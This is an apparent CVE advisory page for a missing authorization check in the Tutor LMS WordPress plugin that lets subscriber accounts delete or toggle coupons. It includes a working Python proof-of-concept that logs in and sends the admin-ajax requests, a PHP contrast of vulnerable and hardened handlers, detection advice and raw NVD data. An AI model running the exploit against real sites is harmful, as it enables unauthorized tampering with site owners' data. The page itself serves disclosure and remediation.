Security Vulnerability Report
CVE-2025-13628 CVSS 4.3 MEDIUM

CVE-2025-13628

Published: 2026-01-09 08:15:57
Last Modified: 2026-04-15 00:35:42

Description

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability check on the 'bulk_action_handler' and 'coupon_permanent_delete' functions in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with subscriber level access and above, to delete, activate, deactivate, or trash arbitrary coupons.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tutor LMS <= 3.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys
from urllib.parse import urljoin

# CVE-2025-13628 PoC - Tutor LMS Authorization Bypass
# Affected: Tutor LMS <= 3.9.3


def exploit_coupon_deletion(target_url, coupon_id, action='delete'):
    """
    Exploit unauthorized coupon manipulation via missing capability check.

    Args:
        target_url: Target WordPress site URL
        coupon_id: ID of coupon to manipulate
        action: Operation to perform (delete, activate, deactivate, trash)
    """
    session = requests.Session()

    # Login as subscriber (low-privilege user)
    login_url = urljoin(target_url, 'wp-login.php')
    login_data = {
        'log': 'subscriber_username',
        'pwd': 'subscriber_password',
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    login_response = session.post(login_url, data=login_data)

    if 'wordpress_logged_in' not in session.cookies:
        print('[-] Login failed')
        return False

    print('[+] Login successful as subscriber')

    # Exploit the authorization bypass
    exploit_url = urljoin(target_url, 'wp-admin/admin-ajax.php')

    # Method 1: bulk_action_handler exploitation
    exploit_data = {
        'action': 'tutor_bulk_action_handler',
        'bulk_action': action,
        'coupon_ids[]': coupon_id
    }
    response = session.post(exploit_url, data=exploit_data)

    if response.status_code == 200:
        print(f'[+] Coupon {coupon_id} {action} request sent')

    # Method 2: coupon_permanent_delete exploitation (for deletion)
    if action == 'delete':
        delete_data = {
            'action': 'tutor_coupon_permanent_delete',
            'coupon_id': coupon_id
        }
        delete_response = session.post(exploit_url, data=delete_data)
        print(f'[+] Permanent delete request sent for coupon {coupon_id}')

    return True


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <coupon_id>')
        print('Example: python exploit.py http://target.com/ 123')
        sys.exit(1)

    target = sys.argv[1]
    coupon_id = sys.argv[2]
    exploit_coupon_deletion(target, coupon_id, 'delete')
```
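The root cause named in the Description is CWE-862 (missing authorization): an admin-ajax handler that performs a destructive action for any logged-in user. The following PHP is an added illustration of that pattern next to its hardened form; it is not Tutor LMS code, and the handler names, the 'coupon_nonce' action and the 'manage_options' capability are hypothetical stand-ins chosen for the example.

```php
<?php
// Added illustration only: NOT Tutor LMS code. Handler names, nonce action and
// capability are hypothetical stand-ins for the pattern behind CWE-862.

// Vulnerable pattern: the handler verifies a nonce and nothing else.
// A nonce is a CSRF control, not an authorization control: any logged-in user
// (a subscriber included) can obtain a valid nonce from a page that prints it,
// so the destructive branch is reachable by every authenticated account.
function hypothetical_coupon_bulk_action_vulnerable() {
    check_ajax_referer( 'coupon_nonce', 'nonce' );           // CSRF check only
    $ids    = array_map( 'absint', (array) ( $_POST['coupon_ids'] ?? array() ) );
    $action = sanitize_key( $_POST['bulk_action'] ?? '' );
    hypothetical_apply_coupon_action( $ids, $action );      // no capability check
    wp_send_json_success();
}

// Hardened pattern: authorize before acting, then validate the requested action.
// Use a capability held only by the roles that manage coupons; 'manage_options'
// is the placeholder here. wp_send_json_error() terminates the request.
function hypothetical_coupon_bulk_action_fixed() {
    check_ajax_referer( 'coupon_nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permission' ), 403 );
    }
    $ids     = array_map( 'absint', (array) ( $_POST['coupon_ids'] ?? array() ) );
    $action  = sanitize_key( $_POST['bulk_action'] ?? '' );
    $allowed = array( 'activate', 'deactivate', 'trash', 'delete' );
    if ( ! in_array( $action, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown action' ), 400 );
    }
    hypothetical_apply_coupon_action( $ids, $action );
    wp_send_json_success();
}

// Placeholder for the state change itself (status update or row deletion).
function hypothetical_apply_coupon_action( array $ids, string $action ) {
}

// Only the hardened handler is registered; the vulnerable one is shown for contrast.
add_action( 'wp_ajax_hypothetical_coupon_bulk_action', 'hypothetical_coupon_bulk_action_fixed' );
```

The check that matters is current_user_can() before any write; the permanent-delete handler needs the same guard, since the advisory lists both functions. For detection on an unpatched site, admin-ajax.php requests carrying the action names shown in the PoC above from accounts that hold only the subscriber role are the signal to alert on.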

References

https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/ecommerce/CouponController.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/46f71f7b-7326-47b6-a23a-68a40f5bb56b?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13628", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:56.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability check on the 'bulk_action_handler' and 'coupon_permanent_delete' functions in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with subscriber level access and above, to delete, activate, deactivate, or trash arbitrary coupons."}, {"lang": "es", "value": "La solución de eLearning y cursos en línea Tutor LMS plugin para WordPress es vulnerable a la modificación y eliminación no autorizadas de datos debido a una verificación de capacidad faltante en las funciones 'bulk_action_handler' y 'coupon_permanent_delete' en todas las versiones hasta la versión, e incluyendo, 3.9.3. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, eliminen, activen, desactiven o envíen a la papelera cupones arbitrarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/ecommerce/CouponController.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/46f71f7b-7326-47b6-a23a-68a40f5bb56b?source=cve", "source": "[email protected]"}]}}
```